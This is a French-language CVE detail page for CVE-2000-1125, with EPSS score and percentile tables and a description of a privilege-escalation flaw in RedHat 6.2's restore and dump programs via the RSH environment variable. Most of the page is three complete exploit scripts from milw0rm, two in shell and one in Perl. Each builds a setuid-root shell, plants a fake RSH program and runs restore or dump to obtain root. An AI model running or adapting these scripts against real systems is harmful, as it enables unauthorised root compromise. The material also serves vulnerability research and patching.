CVE-2000-1125 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	1.76%	–	–
2022-03-27	–	–	1.76%	–	–
2022-04-03	–	–	1.76%	–	–
2022-04-17	–	–	1.76%	–	–
2022-08-28	–	–	1.76%	–	–
2023-03-05	–	–	1.76%	–	–
2023-03-12	–	–	–	0.04%	–
2024-06-02	–	–	–	0.04%	–
2025-01-19	–	–	–	0.04%	–
2025-03-18	–	–	–	–	0.12%
2025-03-30	–	–	–	–	0.15%
2025-04-06	–	–	–	–	0.15%
2025-04-08	–	–	–	–	0.15%
2025-04-09	–	–	–	–	0.15%
2025-04-14	–	–	–	–	0.15%
2025-04-14	–	–	–	–	0.15,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	54%
2022-03-27	55%
2022-04-03	74%
2022-04-17	75%
2022-08-28	76%
2023-03-05	77%
2023-03-12	–
2024-06-02	–
2025-01-19	–
2025-03-18	29%
2025-03-30	31%
2025-04-06	32%
2025-04-08	31%
2025-04-09	32%
2025-04-14	31%
2025-04-14	31%

source: https://www.securityfocus.com/bid/1914/info restore is a program for backup and recovery procedures, distributed with the RedHat Linux Operating System. A vulnerability exists that could allow a user elevated permissions. The problem occurs in the RSH environment variable. restore is dependent upon this environment variable for execution. It is possible to set this variable PATH to that of an executable, and then execute restore. This will result in the executable in the RSH environment variable being run with an EUID of 0. Exploitation of this vulnerability by a malicious user can result in root compromise. #!/bin/sh # # Exploits a stupid bug in redhat 6.2's (others..) restore program. # restore version 0.4b15 executes a program which is found in # a user modifiable environment variable (RSH). # # Have fun! # - fish # # Shoutouts: trey, burke, dono, sinator, jadrax, minuway, lews, hubbs, # ralph, jen, madspin, hampton, ego, als, scorch. # # Cause we da pimpz of #code! (not ef/dal.. etc) # (irc > irl ? werd : lame) # # WERD to the async, isolated, expedience, mindsong, and analog crews # # # #TelcoNinjas can eat it cause they suck hardc0re # #TelcoNinjas == #smurfkiddies # echo "[spl0it]: Starting." echo -n "[spl0it]: creating shell spawn... " echo "#include <stdio.h>" > cool.c echo "int main(void) { " >> cool.c echo " setuid(0);" >> cool.c echo " setgid(0);" >> cool.c echo " execl(\"/bin/sh\", \"-bash\", NULL);" >> cool.c echo " return 0;" >> cool.c echo "}" >> cool.c echo -e "\t\t\tdone" echo -n "[sploit]: Compiling shell spawn... " gcc -o cool cool.c echo -e "\t\t\tdone" echo -n "[sploit]: Creating fake rsh program... " cat > execute_me << EOF #!/bin/sh chown root: cool chmod 4777 cool EOF chmod +x execute_me echo -e "\t\t\tdone" # now executing the dump command echo "[spl0it]: Beginning exploitation: " export TAPE=garbage:garbage export RSH=./execute_me /sbin/restore -i # Exec'n the r00t sh3ll! echo -n "[spl0it]: Waiting 4 seconds for suid shell... " sleep 4 echo -e "\t\tdone" if [ ! -u ./cool ]; then echo "[spl0it]: Hmm it didn't work.. Better luck next time eh" echo "[spl0it]: Check ./cool anyway =)" exit 0 fi echo "[spl0it]: It Worked! suid shell is now ./cool" echo "[spl0it]: Entering suid shell..." ./cool exit 0

#!/bin/sh # # /sbin/restore exploit for rh6.2 # # I did not find this weakness my self, all i did was # writing this script (and some more) to make it # automatic and easy to use. # # This exploit should work on all redhat 6.2 systems # with /sbin/restore not "fucked up". May work on other # distros too, but only tested successfully on rh6.2. # # Make sure that the $USER variable is set! If you aren't # sure, do a SET USER=<your-login-name> before you start # the exploit! # # Please do NOT remove this header from the file. # echo "###########################################" echo "# /sbin/restore exploit for rh6.2 #" echo "# this file by nawok '00 #" echo "###########################################" echo " " echo "==> EXPLOIT STARTED, Wait..." echo "#!/bin/sh" >> /home/$USER/execfile echo "cp /bin/sh /home/$USER/sh" >> /home/$USER/execfile echo "chmod 4755 /home/$USER/sh" >> /home/$USER/execfile chmod 755 /home/$USER/execfile export TAPE=restorer:restorer export RSH=/home/$USER/execfile touch /tmp/1 /sbin/restore -t /tmp/1 rm -f /home/$USER/execfile echo "==> DONE! If everything went OK we will now enter rootshell..." echo "==> To check if its rooted, type 'whoami', or 'id'" echo "==> B-Bye, you are on your own now." /home/$USER/sh # milw0rm.com [2000-11-16]

#!/usr/bin/perl # perl exploit of restore and dump # redhat linux 6.2 # written by tlabs # Use at your discretion $EXPORT1="TAPE=garbage:garbage" ; $EXPORT2="RSH=./hey" ; sub USAGE { print "$0 <type>\n1=dump 2=dump.static 3=restore 4=restore.staic\nYour choice innit;)\nWritten by Tlabs\n" ; exit 0 ; } sub ERROR { print "$_[0]\n" ; exit 0 ; } open(TEMP, ">shell.c")|| ERROR("Something went wrong:$!"); printf TEMP "#include<unistd.h>\n#include<stdlib.h>\nint main()\n{" ; printf TEMP " setuid(0);\n\tsetgid(0);\n\texecl(\"/bin/sh\",\"sh\",0);\n\treturn 0;\n}" ; close(TEMP); system "cc -o shell shell.c" ; unlink "shell.c" ; open(TEMP1, ">hey")|| ERROR("Something went wrong: $!"); printf TEMP1 "#!/bin/sh\nchown root shell\nchmod 4755 shell" ; close(TEMP1); chmod(0755, "hey"); if ($ARGV[$0] eq "1") { $DUMPER="/sbin/dump" ; if ( -u "$DUMPER" ) { system "export $EXPORT1 ;export $EXPORT2 ; $DUMPER -0 \/" ; sleep(3); if ( -u "shell" ) { unlink "hey" ; system "./shell" ; } else { unlink "hey" ; unlink "shell" ; print "Something fucked at the last, sorry" ; } } else { unlink "hey" ; unlink "shell" ; printf "Dump is not exploitable on this system\n"; } } elsif ($ARGV[$0] eq "2") { $DUMPER="/sbin/dump.static" ; if ( -u "$DUMPER" ) { system "export $EXPORT1 ;export $EXPORT2 ; $DUMPER -0 \/" ; sleep(3); if ( -u "shell" ) { unlink "hey" ; system "./shell" ; } else { unlink "hey" ; unlink "shell" ; print "Something fucked at the last, sorry" ; } } else { unlink "hey" ; unlink "shell" ; printf "Dump.static is not exploitable on this system\n"; } } elsif ($ARGV[$0] eq "3") { $RESTORER="/sbin/restore" ; if ( -u "$RESTORER" ) { system "export $EXPORT1 ; export $EXPORT2 ; $RESTORER -i" ; sleep(3); if ( -u "shell" ) { unlink "hey" ; system "./shell" ; } else { unlink "hey" ; unlink "shell" ; print "Something fucked at the last, sorry" ; } } else { unlink "hey" ; unlink "shell" ; printf "Restore is not exploitable on this system\n"; } } elsif ($ARGV[$0] eq "4") { $RESTORER="/sbin/restore.static" ; if ( -u "$RESTORER" ) { system "export $EXPORT1 ; export $EXPORT2 ; $RESTORER -i" ; sleep(3); if ( -u "shell" ) { unlink "hey" ; system "./shell" ; } else { unlink "hey" ; unlink "shell" ; print "Something fucked at the last, sorry" ; } } else { unlink "hey" ; unlink "shell" ; printf "Restore.static is not exploitable on this system\n"; } } else { USAGE ; } # milw0rm.com [2000-11-16]